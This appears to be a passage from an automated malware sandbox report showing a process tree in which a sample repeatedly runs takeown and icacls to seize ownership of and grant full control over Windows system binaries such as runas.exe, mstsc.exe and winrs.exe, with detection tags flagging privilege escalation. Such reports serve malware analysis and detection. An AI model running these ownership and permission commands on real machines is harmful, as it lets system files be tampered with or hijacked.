- Suspicious use of AdjustPrivilegeToken
PID:4728
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\provlaunch.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:2728
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\SysWOW64\msinfo32.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4132
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msinfo32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3048
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\SysWOW64\runas.exe"2⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:2088
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\runas.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:1308
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\SysWOW64\mstsc.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3004
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mstsc.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2188
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\SysWOW64\sdiagnhost.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:848
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdiagnhost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3568
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4676
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4048
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2484
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:1516
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:4072
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1552
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
PID:1920
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2476
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
PID:3432
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3712
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:4828
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1784
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:4388
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:2444
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
PID:2368
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1980
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3940
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:2148
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:3672
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1316
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:3128
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2116
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:4776
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3948
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Modifies file permissions
PID:5060
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1296
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
PID:5048
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:2536
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
PID:3080
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4716
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3160
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:2112
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2872
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:4644
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Modifies file permissions
PID:5000
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1120
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
PID:1680
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2736
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:1868
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4768
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:944
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:1556
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:3504
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2264
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:4756
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4384
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:1552
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2684
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:2332
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:3956
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:1712
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4552
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:3976
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4704
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:1396
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3064
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:2376
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:3400
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:4424
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4580
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3548
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3880
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:3148
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4780
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:4588
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:1336
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:1864
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3000
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
PID:1188
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:1652 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4072
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Modifies file permissions
PID:4380
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1664
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:3840
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:868
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
PID:4592 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1920
-
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2708
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
PID:752
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:4852
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:4284
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:1408
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Modifies file permissions
PID:2380
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1248
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:1984
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4804
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
PID:3020
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5100
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:1388
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4848
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
PID:1588
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4104
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:640
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2952
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:4844
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3712
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:2700
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:100
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2208
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5056
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:208
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1180
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2528
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5036
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
PID:4272
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:5020
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
PID:1516
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4216
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:2316
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4048
-
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:312
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:3744
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4432
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
PID:3488
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3892
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:4684
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4088
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:408
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3608
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:456
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4548
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
PID:4020
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4148
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Modifies file permissions
PID:4864
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1716
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4284
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:5072
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1712
-
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4176
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2684
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
PID:4424
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:3064 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4848
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
PID:1396 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1588
-
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4552
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:944
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
PID:1552 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2536
-
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:868
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Modifies file permissions
PID:1316
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1148
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:1432
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:1560
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:1420
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2700
-
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2732
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:3952
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:100
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Modifies file permissions
PID:1772
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4144
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4332
-
-
